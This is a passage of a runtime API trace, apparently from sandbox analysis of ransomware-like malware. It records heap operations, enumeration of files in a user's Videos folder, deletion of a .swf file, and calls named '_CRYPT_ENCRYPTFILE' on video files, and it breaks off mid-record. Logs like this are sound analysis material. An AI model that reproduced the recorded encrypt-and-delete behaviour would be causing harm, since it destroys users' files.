HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0104.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0104.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0104.111] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf", lpFilePart=0x0) returned 0x45 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0104.111] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\wfup9i.swf")) returned 0x20 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0104.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0104.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0104.112] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e81fc0, ftCreationTime.dwHighDateTime=0x1d5eb4d, ftLastAccessTime.dwLowDateTime=0xc760ef40, ftLastAccessTime.dwHighDateTime=0x1d5e1d5, ftLastWriteTime.dwLowDateTime=0xc760ef40, ftLastWriteTime.dwHighDateTime=0x1d5e1d5, nFileSizeHigh=0x0, nFileSizeLow=0x18cfb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WfuP9I.swf", cAlternateFileName="")) returned 0x41ac700 [0104.112] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\WfuP9I.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\wfup9i.swf")) returned 1 [0104.114] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e81fc0, ftCreationTime.dwHighDateTime=0x1d5eb4d, ftLastAccessTime.dwLowDateTime=0xc760ef40, ftLastAccessTime.dwHighDateTime=0x1d5e1d5, ftLastWriteTime.dwLowDateTime=0xc760ef40, ftLastWriteTime.dwHighDateTime=0x1d5e1d5, nFileSizeHigh=0x0, nFileSizeLow=0x18cfb, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WfuP9I.swf", cAlternateFileName="")) returned 0 [0104.115] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0104.115] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0104.115] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb73f020, ftCreationTime.dwHighDateTime=0x1d5ef00, ftLastAccessTime.dwLowDateTime=0xaa0bc220, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0xaa0bc220, ftLastWriteTime.dwHighDateTime=0x1d5eb86, nFileSizeHigh=0x0, nFileSizeLow=0xcb31, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="yzzjzdDz73JlAs1uEFCr.avi", cAlternateFileName="YZZJZD~1.AVI")) returned 0x41ac040 [0104.115] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0104.115] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0104.115] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0104.115] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0104.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0104.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0104.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0104.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0104.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca820, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0104.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yzzjzddz73jlas1uefcr.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0104.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0104.116] FreeLibrary (hLibModule=0x772d0000) returned 1 [0104.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0104.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca4f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0104.117] CloseHandle (hObject=0x298) returned 1 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0104.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0104.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0104.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0104.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0104.118] FreeLibrary (hLibModule=0x772d0000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0104.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.118] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0104.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0104.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0104.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0104.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0104.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0104.175] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0104.175] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0104.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb73f020, ftCreationTime.dwHighDateTime=0x1d5ef00, ftLastAccessTime.dwLowDateTime=0xaa0bc220, ftLastAccessTime.dwHighDateTime=0x1d5eb86, 